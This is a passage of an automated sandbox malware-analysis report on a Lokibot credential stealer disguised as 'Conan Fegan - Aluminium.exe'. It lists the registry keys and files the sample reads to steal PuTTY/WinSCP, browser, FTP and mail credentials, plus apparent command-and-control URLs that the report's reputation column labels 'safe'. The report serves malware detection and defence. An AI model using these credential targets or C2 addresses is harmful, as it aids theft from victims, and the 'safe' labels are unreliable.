                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00406069 GetUserNameW,5_2_00406069
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected LokibotShow sources
                  Source: Yara matchFile source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE
                  Yara detected LokibotShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Tries to steal Mail credentials (via file registry)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: PopPassword5_2_0040D069
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: SmtpPassword5_2_0040D069
                  Source: Yara matchFile source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE

                  Remote Access Functionality:

                  barindex
                  Yara detected LokibotShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery111Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Virtualization/Sandbox Evasion2Credentials in Registry2Virtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Conan Fegan - Aluminium.exe100%AviraHEUR/AGEN.1138558
                  Conan Fegan - Aluminium.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack100%AviraHEUR/AGEN.1138558Download File
                  5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack100%AviraHEUR/AGEN.1138558Download File
                  0.2.Conan Fegan - Aluminium.exe.960000.0.unpack100%AviraHEUR/AGEN.1138558Download File
                  0.0.Conan Fegan - Aluminium.exe.960000.0.unpack100%AviraHEUR/AGEN.1138558Download File
                  5.2.Conan Fegan - Aluminium.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.comionF0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/;0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnO0%Avira URL Cloudsafe
                  http://kbfvzoboss.bid/alien/fre.php0%Avira URL Cloudsafe
                  http://www.fonts.comc0%URL Reputationsafe
                  http://www.fonts.comc0%URL Reputationsafe
                  http://www.fonts.comc0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.ritcophysiotherapy.com.au/wap121/five/fre.php0%Avira URL Cloudsafe
                  http://alphastand.top/alien/fre.php0%Avira URL Cloudsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm-0%Avira URL Cloudsafe
                  http://alphastand.win/alien/fre.php0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://alphastand.trade/alien/fre.php0%Avira URL Cloudsafe
                  http://www.fontbureau.coma0%URL Reputationsafe
                  http://www.fontbureau.coma0%URL Reputationsafe
                  http://www.fontbureau.coma0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn90%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.coma0%URL Reputationsafe
                  http://www.sajatypeworks.coma0%URL Reputationsafe
                  http://www.sajatypeworks.coma0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.fontbureau.commi0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.founder.com.cn/cng0%Avira URL Cloudsafe
